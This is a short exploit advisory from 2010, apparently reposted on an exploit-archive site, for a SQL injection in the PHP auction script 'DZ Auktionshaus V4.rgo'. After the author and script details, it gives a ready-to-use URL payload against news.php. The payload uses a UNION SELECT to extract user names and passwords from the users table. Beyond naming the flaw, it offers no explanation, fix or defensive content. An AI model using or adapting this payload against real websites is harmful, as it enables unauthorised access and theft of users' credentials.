Home / os / winme

DZ Auktionshaus "V4.rgo" (id) news.php SQL Injecti

Posted on 08 March 2010

================================================================== DZ Auktionshaus "V4.rgo" (id) news.php SQL Injection Vulnerability ================================================================== ----------------------------Information------------------------------------------------ +Name : DZ Auktionshaus "V4.rgo" (id) news.php SQL Injection +Autor : Easy Laster +Date : 08.03.2010 +Script : DZ Auktionshaus "V4.rgo" +Price : 99,99 euro +Language :PHP +Discovered by Easy Laster ---------------------------------------------------------------------------------------- +Vulnerability : http://server/auktionshaus/index.php?view=read&id= +Exploitable : http://server/auktionshaus/news.php?id=null+union+select+1,2,concat (name,0x3a,password),4,5+from+users# ----------------------------------------------------------------------------------------- # ~ - [ [ : Inj3ct0r : ] ]

 

TOP

Malware :